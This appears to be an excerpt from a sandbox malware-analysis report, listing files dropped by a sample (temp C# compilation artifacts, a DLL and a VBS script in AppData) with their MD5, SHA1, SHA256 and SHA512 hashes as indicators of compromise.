SHA1 68c37153a46ddfa8e00e8e7fbe6931c3ba4b8d15
SHA256 748b22122b670fd3a5df87157a14637ecebb01e5e4cfc46785db9b3c646cb26f
SHA512 375f149cf7f3e70e2d2fdd4ce23ca3dfb028126dbb63d6214ad83ec5db1baada98672cdbb51e4901c0f3bc21aa3b442d7ee4abc15ff1537a07c5b388895d1882

\??\c:\Users\Admin\AppData\Local\Temp\hhes_v5z.cmdline

MD5 3eb59cb2ade83138262d8f163e431635
SHA1 dfecd8372cb3e476b685b2d265b1ddd6c2c24787
SHA256 516296628652d04a94fe6d15025dcd0155f7363fb1038e139c166f34c46f1a61
SHA512 9f950f58979c1f352f6286d0c64f0d30ac052977fec54de740228619e6bee9f2848882ccd4c70c466f7b3827895e94530db0fd3d117943c8f32cd9235c3c4f02

\??\c:\Users\Admin\AppData\Local\Temp\hhes_v5z.0.cs

MD5 9b8f2dee116254910197a8801c205862
SHA1 c4fddb1f937921b75c5c988cdb3f459faa446d52
SHA256 5dc90823fdcadfdd6112440b46638cf1ab71285482a67d35e2bf187f68d39ee3
SHA512 00e292822b1e9e94fdf9d91a3edd5cc30f09b02bc6413dde3bb8d1941534637cb0832544f984ed65944e30e473a6820e6816841261efef0f519dab6a14ebf218

\??\c:\Users\Admin\AppData\Local\Temp\CSCF844.tmp

MD5 fa61c06e7f91d77e94ae57bf46bf3500
SHA1 64c58f06a6d125da8bb10e3044103069fca3af7f
SHA256 d8426f4efb7020db186a00efc45566d40d6d19f705b2a1d84a2e667d57e83230
SHA512 af625d8057d8a2d73162798a770ecc3c906334b6b5624df4ddb8985819ccf7a32b67d86c5600685feea4c3c475f5015635bad588b41a9e96b033bcb7ac6af645

C:\Users\Admin\AppData\Local\Temp\RESF845.tmp

MD5 d357105b4812c0d48344a3ec18502d44
SHA1 f03886c219e5fe33ac97b64548339cf8f114d4c0
SHA256 50e66ff1bc3779b6439bc9684d5f8ad9afbebd941f8b11bbaf3638db6bcc2dab
SHA512 d257462dcbcb3d4f017d79202768f94b40e05f9910a174fdbae080862cf43022bf69f458b2c65a9a600d75785de6d53a8f49acfd60af23d04782affe552d5f52

C:\Users\Admin\AppData\Local\Temp\hhes_v5z.dll

MD5 be7a5a5b0d1dafb9d1d153e57bf04eac
SHA1 72c165793ed8f5e9cc938b782838123a07862b44
SHA256 7e551b61458a5925ca884416da116774f907f5f60b1c5ef6d332a0b11b9c5aae
SHA512 6053107a56d99c065883eb8bb91231932f5e34d36ba96ef6812923745ec0c3c2db1dbb6f1af24d520464ce0bf0e833c8cd255e8d2a35241854bd80851d162577

C:\Users\Admin\AppData\Local\Temp\hhes_v5z.pdb

MD5 09e3ae58367a7bbb2ca01f8153ce78a5
SHA1 2ce49883471590fcece9c3a699aba0ff7007d9a5
SHA256 7bc16d51ca6edbc9ad2fb8e19d4be590fb39375a7aa4fbc4171be27c034ec959
SHA512 3f941642169169a81963011f5ca0180d77847fcad593ca4df56655e52bb7b908bd47620842614a1e13f430ac5bd3ae3b1f46cf1df1445ac04f1716bbcd91264e

C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS

MD5 4dd3d6eed0e1ade77fde299848078ef8
SHA1 75855bee75c0c52d00cad1897c381ffc6c706200
SHA256 9bff58b3dfe1955e923ed90e899ac419667de9e6c842753d68614fbf8f612305
SHA512 3c7907b390cedb7f619f1cb9d3aaa24c623a6083995be4a45690e5fd05982df6054e33d1d434cbcb725ad27003529112abb52138d4f5125bfc8680a786701e5d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 e6a8cf52a28d759a8922ad9454306607
SHA1 36af4a24b9085c124c093a85afd1094e688a8bdf
SHA256 0c1cfd6ea375c4a058916f3d1cbd0ddbfa1bd267e0f3fc76ace97126811a59d1
SHA512 c5e85ab44a94ad72b2683a6d6c4ce062be982d8a6a5369e50dde5560f6d69ece08691bd5f966d69c7ee1a5cbf8ee2b8ec345d62cca7170c158cd2ebbd736529f